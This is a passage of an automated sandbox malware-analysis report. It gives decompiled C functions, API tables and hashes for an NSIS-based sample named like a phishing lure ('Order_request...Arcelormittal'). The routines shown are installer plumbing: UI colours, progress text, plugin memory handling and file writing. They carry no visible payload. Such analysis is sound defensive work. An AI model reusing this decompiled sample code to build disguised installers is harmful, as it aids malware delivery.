				_t49 = GetWindowLongW(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}

0x0040416f
0x00404203
0x00000000
0x00404203
0x00404180
0x00404184
0x00000000
0x00000000
0x0040418a
0x00404193
0x00404196
0x00404196
0x0040419c
0x004041a2
0x004041a2
0x004041ae
0x004041b4
0x004041bb
0x004041be
0x004041c1
0x004041c3
0x004041c3
0x004041cb
0x004041d1
0x004041d1
0x004041db
0x004041e0
0x004041e3
0x004041e8
0x004041eb
0x004041eb
0x004041fb
0x004041fb
0x00000000

APIs

GetWindowLongW.USER32(?,000000EB), ref: 0040417A
GetSysColor.USER32(00000000), ref: 00404196
SetTextColor.GDI32(?,00000000), ref: 004041A2
SetBkMode.GDI32(?,?), ref: 004041AE
GetSysColor.USER32(?), ref: 004041C1
SetBkColor.GDI32(?,?), ref: 004041D1
DeleteObject.GDI32(?), ref: 004041EB
CreateBrushIndirect.GDI32(?), ref: 004041F5

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
Instruction ID: 369debbde0f7a754f16ab48c9af260ce6490938065ace01aa15cf7b70dd2699c
Opcode Fuzzy Hash: 1be7c14e932793da5b7e12cfd745236bd09d54aa5f4605660dea7ebeed684375
Instruction Fuzzy Hash: 5F218EB1500704ABCB219F68DE08B5BBBF8AF41710F04892DF996E66A0C734E948CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00404A5B Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404A5B(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageW(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageW(_t28, 0x113e, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageW(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404a69
0x00404a76
0x00404a7c
0x00404aba
0x00404aba
0x00404ac9
0x00404ad0
0x00000000
0x00404ad2
0x00404a7e
0x00404a8d
0x00404a95
0x00404a98
0x00404aaa
0x00404ab0
0x00404ab7
0x00000000
0x00404ab7
0x00000000

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404A76
GetMessagePos.USER32 ref: 00404A7E
ScreenToClient.USER32(?,?), ref: 00404A98
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404AAA
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404AD0

Strings

f, xrefs: 00404AAC

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
Instruction ID: c6f788746afe21c260c1d9be26cb74e88d19e7ad1034c01b3b76a28530fb3a8b
Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
Instruction Fuzzy Hash: 37019E71A4021CBADB00DB94DD81FFEBBFCAF54B10F10002BBA11B61C0C7B49A418BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00402D04 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402D04(struct HWND__* _a4, intOrPtr _a8) {
				short _v132;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x78b6f4; // 0x24cc4
					_t11 =  *0x7976fc; // 0x253b8
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfW( &_v132, L"verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextW(_a4,  &_v132);
					SetDlgItemTextW(_a4, 0x406,  &_v132);
				}
				return 0;
			}

0x00402d14
0x00402d22
0x00402d28
0x00402d28
0x00402d36
0x00402d38
0x00402d3e
0x00402d45
0x00402d47
0x00402d47
0x00402d5d
0x00402d6d
0x00402d7f
0x00402d7f
0x00402d87

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
MulDiv.KERNEL32(00024CC4,00000064,000253B8), ref: 00402D4D
wsprintfW.USER32 ref: 00402D5D
SetWindowTextW.USER32(?,?), ref: 00402D6D
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D7F

Strings

verifying installer: %d%%, xrefs: 00402D57

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 0571604055d31c6dff79b789c0d870111b8eec90378702650be5945f1294d07a
Instruction ID: d409429b390960081b576047ff97edc042c2651f1908c05eaab55558fb75af6b
Opcode Fuzzy Hash: 0571604055d31c6dff79b789c0d870111b8eec90378702650be5945f1294d07a
Instruction Fuzzy Hash: 1B01447064020DAFEF149F61DD49BEA3B69AF04304F008039FA45A91D0DBB89955CB58

Uniqueness

Uniqueness Score: -1.00%

Function 100022D0 Relevance: 9.1, APIs: 6, Instructions: 136
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E100022D0(void* __edx) {
				void* _t38;
				signed int _t39;
				void* _t40;
				void* _t42;
				signed int* _t43;
				signed int* _t51;
				void* _t52;
				void* _t54;

				 *(_t54 + 0x10) = 0 |  *((intOrPtr*)( *((intOrPtr*)(_t54 + 8)) + 0x1014)) > 0x00000000;
				while(1) {
					_t9 =  *((intOrPtr*)(_t54 + 0x18)) + 0x1018; // 0x1018
					_t51 = ( *(_t54 + 0x10) << 5) + _t9;
					_t52 = _t51[6];
					if(_t52 == 0) {
						goto L9;
					}
					_t42 = 0x1a;
					if(_t52 == _t42) {
						goto L9;
					}
					if(_t52 != 0xffffffff) {
						if(_t52 <= 0 || _t52 > 0x19) {
							_t51[6] = _t42;
							goto L12;
						} else {
							_t38 = E100012BA(_t52 - 1);
							L10:
							goto L11;
						}
					} else {
						_t38 = E10001243();
						L11:
						_t52 = _t38;
						L12:
						_t13 =  &(_t51[2]); // 0x1020
						_t43 = _t13;
						if(_t51[1] != 0xffffffff) {
						}
						_t39 =  *_t51;
						_t51[7] = _t51[7] & 0x00000000;
						if(_t39 > 7) {
							L27:
							_t40 = GlobalFree(_t52);
							if( *(_t54 + 0x10) == 0) {
								return _t40;
							}
							if( *(_t54 + 0x10) !=  *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x18)) + 0x1014))) {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) + 1;
							} else {
								 *(_t54 + 0x10) =  *(_t54 + 0x10) & 0x00000000;
							}
							continue;
						} else {
							switch( *((intOrPtr*)(_t39 * 4 +  &M1000244C))) {
								case 0:
									 *_t43 =  *_t43 & 0x00000000;
									goto L27;
								case 1:
									__eax = E10001311(__ebp);
									goto L21;
								case 2:
									 *__edi = E10001311(__ebp);
									__edi[1] = __edx;
									goto L27;
								case 3:
									__eax = GlobalAlloc(0x40,  *0x1000406c);
									 *(__esi + 0x1c) = __eax;
									__edx = 0;
									 *__edi = __eax;
									__eax = WideCharToMultiByte(0, 0, __ebp,  *0x1000406c, __eax,  *0x1000406c, 0, 0);
									goto L27;
								case 4:
									__eax = E1000122C(__ebp);
									 *(__esi + 0x1c) = __eax;
									L21:
									 *__edi = __eax;
									goto L27;
								case 5:
									__eax = GlobalAlloc(0x40, 0x10);
									_push(__eax);
									 *(__esi + 0x1c) = __eax;
									_push(__ebp);
									 *__edi = __eax;
									__imp__CLSIDFromString();
									goto L27;
								case 6:
									if(lstrlenW(__ebp) > 0) {
										__eax = E10001311(__ebp);
										 *__ebx = __eax;
									}
									goto L27;
								case 7:
									 *(__esi + 0x18) =  *(__esi + 0x18) - 1;
									( *(__esi + 0x18) - 1) *  *0x1000406c =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
									 *__ebx =  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18;
									asm("cdq");
									__eax = E10001470(__edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2 + 0x18, __edx,  *0x10004074 + ( *(__esi + 0x18) - 1) *  *0x1000406c * 2);
									goto L27;
							}
						}
					}
					L9:
					_t38 = E1000122C(0x10004044);
					goto L10;
				}
			}

0x100022e4
0x100022e8
0x100022f3
0x100022f3
0x100022fa
0x100022ff
0x00000000
0x00000000
0x10002303
0x10002306
0x00000000
0x00000000
0x1000230b
0x10002316
0x10002326
0x00000000
0x1000231d
0x1000231f
0x10002335
0x00000000
0x10002335
0x1000230d
0x1000230d
0x10002336
0x10002336
0x10002338
0x1000233c
0x1000233c
0x1000233f
0x1000233f
0x10002347
0x10002349
0x10002350
0x10002415
0x10002416
0x10002421
0x1000244b
0x1000244b
0x10002431
0x1000243d
0x10002433
0x10002433
0x10002433
0x00000000
0x10002356
0x10002356
0x00000000
0x1000235d
0x00000000
0x00000000
0x10002366
0x00000000
0x00000000
0x10002374
0x10002376
0x00000000
0x00000000
0x10002397
0x1000239d
0x100023a0
0x100023a2
0x100023b2
0x00000000
0x00000000
0x1000237f
0x10002384
0x10002387
0x10002388
0x00000000
0x00000000
0x100023be
0x100023c4
0x100023c5
0x100023c8
0x100023c9
0x100023cb
0x00000000
0x00000000
0x100023dc
0x100023df
0x100023eb
0x100023ed
0x00000000
0x00000000
0x100023f9
0x10002405
0x10002408
0x1000240a
0x1000240d
0x00000000
0x00000000
0x10002356
0x10002350
0x1000232b
0x10002330
0x00000000
0x10002330

APIs

GlobalFree.KERNEL32(00000000), ref: 10002416

Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C

GlobalAlloc.KERNEL32(00000040), ref: 10002397
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2

Memory Dump Source

Source File: 00000001.00000002.63200218360.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.63200192081.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.63200243775.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.63200269821.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: 629548a8d80b156119ca260ddfff41e2ac9599e7dc7e49857da4672f8da03f10
Instruction ID: a8798eece1b67337def5fc6f06e905ed3cc6fca3e5836deafc22007a072d802d
Opcode Fuzzy Hash: 629548a8d80b156119ca260ddfff41e2ac9599e7dc7e49857da4672f8da03f10
Instruction Fuzzy Hash: A14190B1508305EFF320DF24D885AAA77F8FB883D0F50452DF9468619ADB34AA54DB61

Uniqueness

Uniqueness Score: -1.00%

Function 100024A9 Relevance: 9.1, APIs: 6, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E100024A9(intOrPtr* _a4) {
				intOrPtr _v4;
				intOrPtr* _t24;
				void* _t26;
				intOrPtr _t27;
				signed int _t35;
				void* _t39;
				intOrPtr _t40;
				void* _t43;

				_t39 = E1000121B();
				_t24 = _a4;
				_t40 =  *((intOrPtr*)(_t24 + 0x1014));
				_v4 = _t40;
				_t43 = (_t40 + 0x81 << 5) + _t24;
				do {
					if( *((intOrPtr*)(_t43 - 4)) != 0xffffffff) {
					}
					_t35 =  *(_t43 - 8);
					if(_t35 <= 7) {
						switch( *((intOrPtr*)(_t35 * 4 +  &M100025B9))) {
							case 0:
								 *_t39 =  *_t39 & 0x00000000;
								goto L15;
							case 1:
								_push( *__eax);
								goto L13;
							case 2:
								__eax = E10001470(__edx,  *__eax,  *((intOrPtr*)(__eax + 4)), __edi);
								goto L14;
							case 3:
								__ecx =  *0x1000406c;
								__edx = __ecx - 1;
								__eax = MultiByteToWideChar(0, 0,  *__eax, __ecx, __edi, __edx);
								__eax =  *0x1000406c;
								 *(__edi + __eax * 2 - 2) =  *(__edi + __eax * 2 - 2) & 0x00000000;
								goto L15;
							case 4:
								__eax = lstrcpynW(__edi,  *__eax,  *0x1000406c);
								goto L15;
							case 5:
								_push( *0x1000406c);
								_push(__edi);
								_push( *__eax);
								__imp__StringFromGUID2();
								goto L15;
							case 6:
								_push( *__esi);
								L13:
								__eax = wsprintfW(__edi, __ebp);
								L14:
								__esp = __esp + 0xc;
								goto L15;
						}
					}
					L15:
					_t26 =  *(_t43 + 0x14);
					if(_t26 != 0 && ( *_a4 != 2 ||  *((intOrPtr*)(_t43 - 4)) > 0)) {
						GlobalFree(_t26);
					}
					_t27 =  *((intOrPtr*)(_t43 + 0xc));
					if(_t27 != 0) {
						if(_t27 != 0xffffffff) {
							if(_t27 > 0) {
								E100012E1(_t27 - 1, _t39);
								goto L24;
							}
						} else {
							E10001272(_t39);
							L24:
						}
					}
					_v4 = _v4 - 1;
					_t43 = _t43 - 0x20;
				} while (_v4 >= 0);
				return GlobalFree(_t39);
			}

0x100024b3
0x100024b5
0x100024c4
0x100024ca
0x100024d7
0x100024d9
0x100024dd
0x100024dd
0x100024e5
0x100024eb
0x100024ed
0x00000000
0x100024f4
0x00000000
0x00000000
0x100024fa
0x00000000
0x00000000
0x10002504
0x00000000
0x00000000
0x1000250b
0x10002511
0x1000251d
0x10002523
0x10002528
0x00000000
0x00000000
0x1000254a
0x00000000
0x00000000
0x10002530
0x10002536
0x10002537
0x10002539
0x00000000
0x00000000
0x10002552
0x10002554
0x10002556
0x10002558
0x10002558
0x00000000
0x00000000
0x100024ed
0x1000255b
0x1000255b
0x10002560
0x10002572
0x10002572
0x10002578
0x1000257d
0x10002582
0x1000258e
0x10002593
0x00000000
0x10002598
0x10002584
0x10002585
0x10002599
0x10002599
0x10002582
0x1000259a
0x1000259e
0x100025a1
0x100025b8

APIs

Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225

GlobalFree.KERNEL32(?), ref: 10002572
GlobalFree.KERNEL32(00000000), ref: 100025AD

Memory Dump Source

Source File: 00000001.00000002.63200218360.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true

Associated: 00000001.00000002.63200192081.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.63200243775.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000001.00000002.63200269821.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_10000000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
Instruction ID: 76257f5bf6759f365bfcd452de7d39bb0b2322773c3eba187a8a795e141f7608
Opcode Fuzzy Hash: a621a955531d0e661206b23193f22b54096652e1fd49661ebc4a0141683b6ddb
Instruction Fuzzy Hash: 6831DE71504A21EFF321CF14CCA8E2B7BF8FB853D2F114529FA40961A8CB319851DB69

Uniqueness

Uniqueness Score: -1.00%

Function 00402840 Relevance: 9.1, APIs: 6, Instructions: 86
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 37%

			E00402840(void* __ebx) {
				void* _t26;
				long _t31;
				void* _t45;
				void* _t49;
				void* _t51;
				void* _t54;
				void* _t55;
				void* _t56;

				_t45 = __ebx;
				 *((intOrPtr*)(_t56 - 0x48)) = 0xfffffd66;
				_t50 = E00402BBF(0xfffffff0);
				 *(_t56 - 0x38) = _t23;
				if(E00405A5D(_t50) == 0) {
					E00402BBF(0xffffffed);
				}
				E00405BE2(_t50);
				_t26 = E00405C07(_t50, 0x40000000, 2);
				 *(_t56 + 8) = _t26;
				if(_t26 != 0xffffffff) {
					_t31 =  *0x7a8a54;
					 *(_t56 - 8) = _t31;
					_t49 = GlobalAlloc(0x40, _t31);
					if(_t49 != _t45) {
						E00403235(_t45);
						E0040321F(_t49,  *(_t56 - 8));
						_t54 = GlobalAlloc(0x40,  *(_t56 - 0x24));
						 *(_t56 - 0x34) = _t54;
						if(_t54 != _t45) {
							_push( *(_t56 - 0x24));
							_push(_t54);
							_push(_t45);
							_push( *((intOrPtr*)(_t56 - 0x28)));
							E00403027();
							while( *_t54 != _t45) {
								_t47 =  *_t54;
								_t55 = _t54 + 8;
								 *(_t56 - 0x4c) =  *_t54;
								E00405BC2( *((intOrPtr*)(_t54 + 4)) + _t49, _t55, _t47);
								_t54 = _t55 +  *(_t56 - 0x4c);
							}
							GlobalFree( *(_t56 - 0x34));
						}
						E00405CB9( *(_t56 + 8), _t49,  *(_t56 - 8));
						GlobalFree(_t49);
						_push(_t45);
						_push(_t45);
						_push( *(_t56 + 8));
						_push(0xffffffff);
						 *((intOrPtr*)(_t56 - 0x48)) = E00403027();
					}
					CloseHandle( *(_t56 + 8));
				}
				_t51 = 0xfffffff3;
				if( *((intOrPtr*)(_t56 - 0x48)) < _t45) {
					_t51 = 0xffffffef;
					DeleteFileW( *(_t56 - 0x38));
					 *((intOrPtr*)(_t56 - 4)) = 1;
				}
				_push(_t51);
				E00401423();
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t56 - 4));
				return 0;
			}

0x00402840
0x00402842
0x0040284e
0x00402851
0x0040285b
0x0040285f
0x0040285f
0x00402865
0x00402872
0x0040287a
0x0040287d
0x00402883
0x00402891
0x00402896
0x0040289a
0x0040289d
0x004028a6
0x004028b2
0x004028b6
0x004028b9
0x004028bb
0x004028be
0x004028bf
0x004028c0
0x004028c3
0x004028e2
0x004028ca
0x004028cf
0x004028d7
0x004028da
0x004028df
0x004028df
0x004028e9
0x004028e9
0x004028f6
0x004028fc
0x00402902
0x00402903
0x00402904
0x00402907
0x0040290e
0x0040290e
0x00402914
0x00402914
0x0040291f
0x00402920
0x00402924
0x00402928
0x0040292e
0x0040292e
0x00402935
0x004021dc
0x00402a4f
0x00402a5b

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
GlobalFree.KERNEL32(?), ref: 004028E9
GlobalFree.KERNEL32(00000000), ref: 004028FC
CloseHandle.KERNEL32(?), ref: 00402914
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928

Memory Dump Source

Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: 598869ac1d0c0d8c1f48ea91ef13a2e3ea5b07d01dc90d54694cccaa19b6dd20
Instruction ID: a3a02304b7bf1fff1c024f37f895186886f0ecb363175dbf1b7b9d1a7e5804fa
Opcode Fuzzy Hash: 598869ac1d0c0d8c1f48ea91ef13a2e3ea5b07d01dc90d54694cccaa19b6dd20
Instruction Fuzzy Hash: 3221A072800114BBDF216FA5CE49D9E7E79EF09324F24423AF550762E1CB795E41CB98

Uniqueness

Uniqueness Score: -1.00%

Function 00402537 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00402537(int __ebx, void* __edx, intOrPtr* __esi) {
				signed int _t13;
				int _t16;
				int _t23;
				signed int _t28;
				intOrPtr* _t31;
				void* _t33;
				void* _t34;
				void* _t37;
				signed int _t39;

				_t31 = __esi;
				_t23 = __ebx;
				_t13 =  *(_t34 - 0x24);
				_t37 = __edx - 0x38;
				 *(_t34 - 0x34) = _t13;
				_t26 = 0 | _t37 == 0x00000000;
				_t28 = _t37 == 0;
				if(_t13 == __ebx) {
					if(__edx != 0x38) {
						_t16 = lstrlenW(E00402BBF(0x11)) + _t15;
					} else {
						E00402BBF(0x21);
						WideCharToMultiByte(__ebx, __ebx, "C:\Users\Arthur\AppData\Local\Temp\nspD224.tmp", 0xffffffff, "C:\Users\Arthur\AppData\Local\Temp\nspD224.tmp\System.dll", 0x400, __ebx, __ebx);
						_t16 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nspD224.tmp\System.dll");
					}
				} else {
					E00402BA2(1);
					 *0x40adc8 = __ax;
				}
				 *(_t34 + 8) = _t16;
				if( *_t31 == _t23) {
					L13:
					 *((intOrPtr*)(_t34 - 4)) = 1;
				} else {
					_t33 = E00405F92(_t26, _t31);
					if((_t28 |  *(_t34 - 0x34)) != 0 ||  *((intOrPtr*)(_t34 - 0x20)) == _t23 || E00405CE8(_t33, _t33) >= 0) {
						_t13 = E00405CB9(_t33, "C:\Users\Arthur\AppData\Local\Temp\nspD224.tmp\System.dll",  *(_t34 + 8));
						_t39 = _t13;
						if(_t39 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t34 - 4));
				return 0;
			}

0x00402537
0x00402537
0x00402537
0x0040253c
0x0040253f
0x00402542
0x00402547
0x00402549
0x00402565
0x004025a3
0x00402567
0x00402569
0x00402583
0x0040258e
0x0040258e
0x0040254b
0x0040254d
0x00402552
0x0040255f
0x004025a8
0x004025ab
0x0040281e
0x0040281e
0x004025b1
0x004025ba
0x004025bc
0x004025db
0x004015ac
0x004015ae
0x00000000
0x004015b4
0x00000000
0x00000000
0x00000000
0x004025bc
0x00402a4f
0x00402a5b

APIs

